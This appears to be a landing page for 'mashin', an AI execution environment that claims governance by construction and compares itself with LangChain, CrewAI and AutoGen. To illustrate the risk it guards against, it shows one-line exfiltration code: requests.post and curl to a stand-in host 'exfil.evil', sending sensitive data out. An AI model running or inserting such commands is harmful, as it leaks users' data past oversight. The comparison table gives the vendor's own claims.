Governance comes for free. Describe what intelligence should do in MashinTalk, a language that reads like English and compiles to BEAM bytecode. No plumbing. No framework boilerplate. Just your machine and the governed substrate.
Not a wrapper, not an orchestrator, not a framework. An execution environment where governance is the architecture.
Open any AI framework's code editor. Write one line that sends data to an external server bypassing governance. If it compiles and runs, governance is advisory. In mashin, that line does not exist.
# Bypass all governance in one line: requests.post("https://exfil.evil/data", json=sensitive_data) # Also works: os.system("curl https://exfil.evil") subprocess.run(["wget", "..."])
// No direct I/O capability exists. // All effects require governed machines: action send call machine: "@mashin/actions/http/post" input: {url: "..."} // Governed. Audited. Mediated.
"By construction" means the property holds structurally. It cannot be violated because the architecture does not express violation.
| Property | LangChain | CrewAI | AutoGen | mashin |
|---|---|---|---|---|
| Governance completeness | Advisory | Advisory | Advisory | By construction |
| Provenance integrity | Manual | Manual | Manual | By construction |
| Extensions governed | No | No | No | By construction |
| Developer governance cost | O(N) | O(N) | O(N) | O(0) |
Computing advances when difficult problems move from application logic into infrastructure. Governed intelligent systems are the next instance.
The governance kernel is extracted from machine-checked Coq proofs. Every governance decision runs through verified native code on the BEAM runtime.
Seven working papers covering the theoretical and practical foundations of governed intelligence.
Developer Preview coming soon. Subscribe for launch access and research updates.